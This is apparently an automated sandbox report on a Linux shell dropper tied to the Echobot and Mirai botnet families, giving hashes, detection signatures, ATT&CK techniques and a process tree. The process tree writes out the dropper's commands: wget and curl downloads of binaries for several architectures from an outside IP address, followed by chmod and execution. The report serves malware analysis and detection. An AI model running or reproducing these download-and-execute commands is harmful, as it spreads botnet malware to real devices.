Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10/01/2025, 19:07
Static task
static1
Behavioral task
behavioral1
Sample
8UsA.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
8UsA.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
8UsA.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
17bed510a00fcaba1dfad2de86d3f0ac
-
SHA1
bd93c9b1642d9291731933387f1d751c85c6d323
-
SHA256
7a091ce1dfccdfff5db4938ebd85a0a088b255a1ddc0bae4431e160316ef8995
-
SHA512
27d29c3a78b954855c5d29b13a1f69fe8b5fdc4ac4533eccc82a35aab6cf3b9cf34b6990e09fe4fa1a35397bc0d786ecec3fb1b97d8d66cf8e5ef0ebdd149dc9
Malware Config
Signatures
-
Detected Echobot 3 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_echobot behavioral4/files/fstream-4.dat family_echobot behavioral4/files/fstream-5.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (189725) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 7 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 855 chmod 869 chmod 883 chmod 735 chmod 741 chmod 759 chmod 785 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/3AvA 736 3AvA /tmp/3AvA 742 3AvA /tmp/3AvA 760 3AvA /tmp/3AvA 786 3AvA /tmp/3AvA 856 3AvA /tmp/3AvA 870 3AvA /tmp/3AvA 884 3AvA -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA -
Enumerates active TCP sockets 1 TTPs 5 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 4 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself c1pmppphj2ohmmdh1c2 760 3AvA Changes the process name, possibly in an attempt to hide itself kipgb4bi0bj05beoofd 786 3AvA Changes the process name, possibly in an attempt to hide itself 543gaf0d0bnkgpn0f00 856 3AvA Changes the process name, possibly in an attempt to hide itself ao5m5cg5fbi31j 870 3AvA -
Reads system network configuration 1 TTPs 5 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA -
description ioc Process File opened for reading /proc/236/fd 3AvA File opened for reading /proc/377/fd 3AvA File opened for reading /proc/884/fd 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/376/fd 3AvA File opened for reading /proc/946/exe 3AvA File opened for reading /proc/354/fd 3AvA File opened for reading /proc/377/fd 3AvA File opened for reading /proc/324/fd 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/167/fd 3AvA File opened for reading /proc/810/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1/fd 3AvA File opened for reading /proc/144/fd 3AvA File opened for reading /proc/167/fd 3AvA File opened for reading /proc/704/fd 3AvA File opened for reading /proc/432/fd 3AvA File opened for reading /proc/319/fd 3AvA File opened for reading /proc/956/exe 3AvA File opened for reading /proc/678/fd 3AvA File opened for reading /proc/886/fd 3AvA File opened for reading /proc/702/exe 3AvA File opened for reading /proc/899/exe 3AvA File opened for reading /proc/319/fd 3AvA File opened for reading /proc/678/fd 3AvA File opened for reading /proc/377/fd 3AvA File opened for reading /proc/703/exe 3AvA File opened for reading /proc/762/fd 3AvA File opened for reading /proc/358/fd 3AvA File opened for reading /proc/672/fd 3AvA File opened for reading /proc/356/fd 3AvA File opened for reading /proc/678/fd 3AvA File opened for reading /proc/167/fd 3AvA File opened for reading /proc/704/fd 3AvA File opened for reading /proc/376/fd 3AvA File opened for reading /proc/377/fd 3AvA File opened for reading /proc/816/exe 3AvA File opened for reading /proc/705/fd 3AvA File opened for reading /proc/354/fd 3AvA File opened for reading /proc/705/fd 3AvA File opened for reading /proc/705/exe 3AvA File opened for reading /proc/902/exe 3AvA File opened for reading /proc/889/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/354/fd 3AvA File opened for reading /proc/236/fd 3AvA File opened for reading /proc/236/fd 3AvA File opened for reading /proc/700/exe 3AvA File opened for reading /proc/677/fd 3AvA File opened for reading /proc/144/fd 3AvA File opened for reading /proc/672/fd 3AvA File opened for reading /proc/432/fd 3AvA File opened for reading /proc/677/fd 3AvA File opened for reading /proc/936/exe 3AvA File opened for reading /proc/667/exe 3AvA File opened for reading /proc/857/exe 3AvA File opened for reading /proc/358/fd 3AvA File opened for reading /proc/909/exe 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/236/fd 3AvA File opened for reading /proc/857/fd 3AvA File opened for reading /proc/888/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 738 wget 739 curl 740 cat 742 3AvA -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UnHAnaAW.x86 wget File opened for modification /tmp/UnHAnaAW.x86 curl File opened for modification /tmp/UnHAnaAW.mpsl wget File opened for modification /tmp/UnHAnaAW.arm5 wget File opened for modification /tmp/UnHAnaAW.arm6 wget File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/UnHAnaAW.arm4 curl File opened for modification /tmp/UnHAnaAW.arm7 curl File opened for modification /tmp/UnHAnaAW.mips wget File opened for modification /tmp/UnHAnaAW.mips curl File opened for modification /tmp/UnHAnaAW.mpsl curl File opened for modification /tmp/UnHAnaAW.arm5 curl File opened for modification /tmp/UnHAnaAW.arm7 wget File opened for modification /tmp/UnHAnaAW.arm6 curl
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:704 -
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.x862⤵
- Writes file to tmp directory
PID:710
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/catcat UnHAnaAW.x862⤵PID:734
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.mips UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.mpsl2⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/catcat UnHAnaAW.mpsl2⤵PID:758
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:760
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.arm42⤵PID:765
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:786
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.arm52⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.arm52⤵
- Writes file to tmp directory
PID:822
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:856
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.arm62⤵
- Writes file to tmp directory
PID:866
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.arm62⤵
- Writes file to tmp directory
PID:867
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:870
-
-
/usr/bin/wgetwget http://141.98.10.115/bins/UnHAnaAW.arm72⤵
- Writes file to tmp directory
PID:874
-
-
/usr/bin/curlcurl -O http://141.98.10.115/bins/UnHAnaAW.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:884
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD5e4a5bb69952d1c35c29b3368e8fc17c6
SHA16f8e1ba0b25d60ccb607821337a07d533cbf46d0
SHA2566fed6148fd27b402300a9e3b30e74af00c20af4cb0caa692f69d9e06b7f30eac
SHA5128c7bf047abb4326a51229a6f777834aecf600a76d2f15f5fb62b529dfb24f81b376cae135993203356f453b7228fbba7a2f0deb77a64660a48294d61346b6583
-
Filesize
102KB
MD51cd00bebdc0480e95850211e14b24d96
SHA119506b0f0cd9a8d66a3907aa11966919034a3cd7
SHA25664a64aa629ee41ee060556663ff11de272e66e6faf7e82fcec04139e64ed0407
SHA512234cea8d366c082b3ee4186fddec198cb66bf6fa437ddc676bed3772c5d1f51f53391a5b57c36fc729ac2ad98121ff381dad56a1049919885d010b1b71a91d02
-
Filesize
69KB
MD5fd52a40caadc60323f116d6c5d428aab
SHA1abf8f199130a7b6a9a8886708a4e9f1c6c305cfc
SHA2564de6ec9db86da28a37e3cc1ebd5958856212be7fb403829413277cb091507033
SHA512d541dbfc62019444bc18561cdf3f823ab75fd78bf73b3debeb2ac145419d7e1f4e0a15fc67deca8f83582ac508ce06ace57c03cac03ec9d0164a7841547a1447